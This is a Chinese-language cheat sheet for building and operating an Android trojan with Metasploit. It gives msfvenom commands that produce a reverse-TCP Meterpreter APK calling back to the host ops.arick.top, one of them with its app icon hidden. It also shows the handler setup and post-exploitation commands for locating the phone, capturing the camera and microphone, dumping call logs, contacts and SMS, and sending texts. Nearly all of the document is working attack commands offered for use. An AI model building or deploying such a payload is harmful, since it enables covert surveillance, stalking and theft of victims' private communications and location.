跳到主要内容

Metasploit android 木马

msfconsole #进入Metasploit软件

use android/meterpreter/reverse_tcp #选择payload类型

show options #查看payload所需参数

生成木马

msfvenom -p android/meterpreter/reverse_tcp LHOST=ops.arick.top LPORT=7899 R>~/Desktop/pentest.apk


msfvenom -p android/meterpreter/reverse_tcp LHOST=ops.arick.top LPORT=7899 -e x86/shikata_ga_nai -x cc.exe -i 5 R > pentest.apk

msfvenom -p android/meterpreter/reverse_tcp AndroidHideAppIcon=true AndroidWakeLock=true LHOST=ops.arick.top LPORT=7899 -f raw -o HackersAriseMalwareApp.apk AndroidMalware.apk

-f raw 这将创建原始格式 (-f)的有效载荷

开启Metasploit进行监听

使用metasploit监听本地接受数据的端口

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 7899
exploit

对手机进行定位

wlan_geolocate       // 使用WLAN信息获取当前地理位置
geolocate // 利用地理定位(GPS)获取当前LAT

调用手机摄像头

webcam_list      // 列出网络摄像头
webcam_snap 1 //镜头1或2进行拍照
webcam_chat // 开始视频聊天
webcam_stream -i 1 // 从指定的网络摄像头播放视频流

调用麦克风

record_mic -d x      // 从默认麦克风录制音频为X秒

此命令默认录制默认麦克风录制1秒钟的音频,并将尝试不带精度的参数来播放捕获的音频wav文件。

获取通讯记录信息

dump_calllog      // 下载目标手机上的通话记录
dump_contacts // 获取联系人列表
dump_sms // 获取短信

控制目标手机发送短信

send_sms -d 某个手机号码 -t "hello"

查看系统信息

sysinfo

查看手机是否root过

check_root

其他命令

execute 执行一个命令 
getuid 获取当前运行的用户
localtime 显示目标系统的本地日期和时间
pgrep 按名称筛选进程
ps 列出正在运行的进程

用户界面命令
===============================
screenshare 实时监视远程用户的桌面
screenshot 抓取交互式桌面的屏幕截图

音频输出命令
=============================
play 在目标系统上播放波形音频文件(.wav)

应用程序控制器命令
===============================
app_install 请求安装apk文件
app_list 列出设备中已安装的应用程序
app_run 启动包名称的主活动
app_uninstall 请求卸载apk文件

![[Pasted image 20230103175033.png]]

33